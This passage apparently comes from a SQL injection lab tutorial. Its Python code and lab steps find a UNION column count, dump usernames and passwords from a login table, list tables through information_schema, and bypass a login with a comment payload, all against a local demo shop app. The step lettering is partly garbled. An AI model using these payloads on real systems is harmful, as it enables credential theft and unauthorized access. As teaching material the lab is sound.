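    """Steps 15-16: add NULL columns until UNION stops complaining.
    NULL is used because it is compatible with every column type."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        _, error = search(f"django' UNION ALL SELECT {nulls} -- ")
        if error is None:
            return n
    return None


def dump_logins(search, ncols):
    """Step 23: username and password take the first two slots; the rest are
    padded with NULL so the column count matches. A product name that does
    not exist keeps the real rows out of the result."""
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    rows, _ = search(f"nosuchproduct' UNION ALL SELECT {', '.join(cols)} FROM login -- ")
    return rows


def demo():
    """Run the whole chain and return what each step found."""
    ncols = find_column_count(shop_search_vulnerable)
    return {
        "injectable": is_injectable(shop_search_vulnerable),
        "columns": ncols,
        "logins": dump_logins(shop_search_vulnerable, ncols),
        # Step 10: the comment removes the password check entirely.
        "bypass": login_vulnerable("admin' and 1=1 -- ", "wrong"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

find_column_count relies on the application leaking the error, which is the error-based case this experiment teaches; when errors are suppressed, tools fall back to comparing page content or response timing for each candidate count, but the loop structure is the same.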
Step 17: Choose page 6 and read the following instructions:
Step 18: Dumping data from the database
a) Type django' union select 1, table_name from information_schema.tables# in the textbox
b) Click on Submit
c) Observe the output
c) Click on submit.
d) Observe the output.
Step 23: Analyzing the modified query
a) Modified Query: select product_name, price from product where
name='django' union all select username, password from login#